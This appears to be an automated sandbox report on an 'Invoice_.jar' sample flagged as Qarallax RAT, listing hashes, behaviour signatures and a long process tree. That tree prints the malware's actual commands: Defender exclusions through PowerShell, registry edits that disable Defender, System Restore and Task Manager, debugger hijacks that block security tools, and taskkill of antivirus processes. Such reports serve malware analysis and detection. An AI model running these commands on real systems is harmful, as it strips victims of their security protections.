Analysis

  • max time kernel
    148s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    23-09-2020 10:37

General

  • Target

    Invoice_.jar

  • Size

    403KB

  • MD5

    cf937e091a57e2a92baf1b8e635a0595

  • SHA1

    1eab495dce63c73a138ed476f7309ef0e6bc1361

  • SHA256

    bd0689a49b290187170ebe5ad6d582d18b7d13681b28e951f04172d79265d0fa

  • SHA512

    bdc6f86f2bdc56ddf969ac8c7690bc305c034aaa3aaf6bde82400dea5ac5d47f54179a0d7ef5fbe1399b4aefe125b5ffd99f26bc966c313aad944918c9056892

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • QarallaxRAT

    Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).

  • Qarallax RAT support DLL 1 IoCs
  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Sets file execution options in registry 2 TTPs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops desktop.ini file(s) 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Kills process with taskkill 19 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 100 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 798 IoCs
  • Views/modifies file attributes 1 TTPs 8 IoCs

Processes

  • C:\Windows\system32\java.exe
    java -jar C:\Users\Admin\AppData\Local\Temp\Invoice_.jar
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1424
    • C:\Windows\system32\cmd.exe
      cmd.exe
      2⤵
        PID:1876
      • C:\Windows\system32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1980
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2040
      • C:\Windows\system32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1988
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1896
      • C:\Windows\system32\attrib.exe
        attrib +h C:\Users\Admin\Oracle
        2⤵
        • Views/modifies file attributes
        PID:1312
      • C:\Windows\system32\attrib.exe
        attrib +h +r +s C:\Users\Admin\.ntusernt.ini
        2⤵
        • Views/modifies file attributes
        PID:520
      • C:\Windows\system32\attrib.exe
        attrib -s -r C:\Users\Admin\bTTIR\Desktop.ini
        2⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:1672
      • C:\Windows\system32\attrib.exe
        attrib +s +r C:\Users\Admin\bTTIR\Desktop.ini
        2⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:544
      • C:\Windows\system32\attrib.exe
        attrib -s -r C:\Users\Admin\bTTIR
        2⤵
        • Views/modifies file attributes
        PID:1276
      • C:\Windows\system32\attrib.exe
        attrib +s +r C:\Users\Admin\bTTIR
        2⤵
        • Views/modifies file attributes
        PID:764
      • C:\Windows\system32\attrib.exe
        attrib +h C:\Users\Admin\bTTIR
        2⤵
        • Views/modifies file attributes
        PID:724
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r C:\Users\Admin\bTTIR\SOAqQ.class
        2⤵
        • Views/modifies file attributes
        PID:1496
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\bTTIR','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\bTTIR\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1412
      • C:\Windows\system32\cmd.exe
        cmd.exe
        2⤵
          PID:916
          • C:\Windows\system32\reg.exe
            reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
            3⤵
              PID:1468
            • C:\Windows\system32\reg.exe
              reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
              3⤵
                PID:2356
            • C:\Windows\System32\reg.exe
              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
              2⤵
                PID:1608
              • C:\Windows\System32\reg.exe
                "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
                2⤵
                  PID:884
                • C:\Windows\System32\taskkill.exe
                  "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
                  2⤵
                  • Kills process with taskkill
                  PID:608
                • C:\Windows\System32\reg.exe
                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                  2⤵
                    PID:1124
                  • C:\Windows\System32\reg.exe
                    "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
                    2⤵
                      PID:1800
                    • C:\Windows\System32\reg.exe
                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
                      2⤵
                        PID:1764
                      • C:\Windows\System32\reg.exe
                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                        2⤵
                          PID:2000
                        • C:\Windows\System32\reg.exe
                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                          2⤵
                            PID:2004
                          • C:\Windows\System32\reg.exe
                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
                            2⤵
                              PID:2040
                            • C:\Windows\System32\reg.exe
                              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                              2⤵
                                PID:1052
                              • C:\Windows\System32\reg.exe
                                "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
                                2⤵
                                  PID:272
                                • C:\Windows\System32\reg.exe
                                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                  2⤵
                                    PID:392
                                  • C:\Windows\System32\reg.exe
                                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                    2⤵
                                      PID:588
                                    • C:\Windows\System32\reg.exe
                                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
                                      2⤵
                                        PID:512
                                      • C:\Windows\System32\reg.exe
                                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                        2⤵
                                          PID:800
                                        • C:\Windows\System32\reg.exe
                                          "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
                                          2⤵
                                            PID:324
                                          • C:\Windows\System32\reg.exe
                                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                            2⤵
                                              PID:2008
                                            • C:\Windows\System32\reg.exe
                                              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
                                              2⤵
                                                PID:1892
                                              • C:\Windows\System32\reg.exe
                                                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                2⤵
                                                  PID:1544
                                                • C:\Windows\System32\taskkill.exe
                                                  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
                                                  2⤵
                                                  • Kills process with taskkill
                                                  PID:1140
                                                • C:\Windows\System32\reg.exe
                                                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                  2⤵
                                                    PID:1496
                                                  • C:\Windows\System32\reg.exe
                                                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                    2⤵
                                                      PID:2036
                                                    • C:\Windows\System32\reg.exe
                                                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
                                                      2⤵
                                                        PID:2064
                                                      • C:\Windows\System32\reg.exe
                                                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                        2⤵
                                                          PID:2100
                                                        • C:\Windows\System32\reg.exe
                                                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                          2⤵
                                                            PID:2108
                                                          • C:\Windows\System32\reg.exe
                                                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                            2⤵
                                                              PID:2132
                                                            • C:\Windows\System32\reg.exe
                                                              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                              2⤵
                                                                PID:2156
                                                              • C:\Windows\System32\reg.exe
                                                                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                2⤵
                                                                  PID:2188
                                                                • C:\Windows\System32\reg.exe
                                                                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                  2⤵
                                                                    PID:2204
                                                                  • C:\Windows\System32\reg.exe
                                                                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                    2⤵
                                                                      PID:2228
                                                                    • C:\Windows\System32\reg.exe
                                                                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                      2⤵
                                                                        PID:2248
                                                                      • C:\Windows\System32\reg.exe
                                                                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                        2⤵
                                                                          PID:2280
                                                                        • C:\Windows\System32\reg.exe
                                                                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                          2⤵
                                                                            PID:2304
                                                                          • C:\Windows\System32\reg.exe
                                                                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                            2⤵
                                                                              PID:2328
                                                                            • C:\Windows\System32\taskkill.exe
                                                                              "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
                                                                              2⤵
                                                                              • Kills process with taskkill
                                                                              PID:2372
                                                                            • C:\Windows\system32\cmd.exe
                                                                              cmd.exe
                                                                              2⤵
                                                                                PID:2512
                                                                                • C:\Windows\system32\reg.exe
                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
                                                                                  3⤵
                                                                                    PID:2544
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
                                                                                    3⤵
                                                                                      PID:2636
                                                                                  • C:\Windows\System32\taskkill.exe
                                                                                    "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
                                                                                    2⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:2624
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    cmd.exe
                                                                                    2⤵
                                                                                      PID:2736
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
                                                                                        3⤵
                                                                                          PID:2768
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
                                                                                          3⤵
                                                                                            PID:2788
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          cmd.exe
                                                                                          2⤵
                                                                                            PID:2804
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
                                                                                              3⤵
                                                                                                PID:2816
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
                                                                                                3⤵
                                                                                                  PID:2856
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                cmd.exe
                                                                                                2⤵
                                                                                                  PID:2868
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
                                                                                                    3⤵
                                                                                                      PID:2880
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
                                                                                                      3⤵
                                                                                                        PID:2896
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      cmd.exe
                                                                                                      2⤵
                                                                                                        PID:2916
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
                                                                                                          3⤵
                                                                                                            PID:2928
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
                                                                                                            3⤵
                                                                                                              PID:2948
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            cmd.exe
                                                                                                            2⤵
                                                                                                              PID:2960
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
                                                                                                                3⤵
                                                                                                                  PID:2972
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:3004
                                                                                                                • C:\Windows\System32\taskkill.exe
                                                                                                                  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
                                                                                                                  2⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:2984
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  cmd.exe
                                                                                                                  2⤵
                                                                                                                    PID:3024
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:3040
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:1252
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        cmd.exe
                                                                                                                        2⤵
                                                                                                                          PID:1112
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:2076
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:2128
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              cmd.exe
                                                                                                                              2⤵
                                                                                                                                PID:2184
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:2200
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
                                                                                                                                    3⤵
                                                                                                                                      PID:2216
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    cmd.exe
                                                                                                                                    2⤵
                                                                                                                                      PID:2256
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:2292
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:2316
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          cmd.exe
                                                                                                                                          2⤵
                                                                                                                                            PID:1860
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:832
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:1932
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                cmd.exe
                                                                                                                                                2⤵
                                                                                                                                                  PID:544
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:1824
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                        PID:1016
                                                                                                                                                    • C:\Windows\System32\taskkill.exe
                                                                                                                                                      "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
                                                                                                                                                      2⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:2244
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      cmd.exe
                                                                                                                                                      2⤵
                                                                                                                                                        PID:672
                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:1504
                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:588
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            cmd.exe
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1052
                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:2084
                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:2008
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  cmd.exe
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:856
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:1964
                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:2180
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        cmd.exe
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2188
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:2204
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:2220
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              cmd.exe
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:2276
                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:1892
                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:2396
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:2392
                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:2108
                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:2468
                                                                                                                                                                                        • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                          "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                          PID:2424
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:2456
                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:2448
                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:2168
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:1876
                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:64
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:2464
                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:32
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:1544
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:2228
                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:2472
                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:2332
                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:2248
                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:2272
                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
                                                                                                                                                                                                                  3⤵
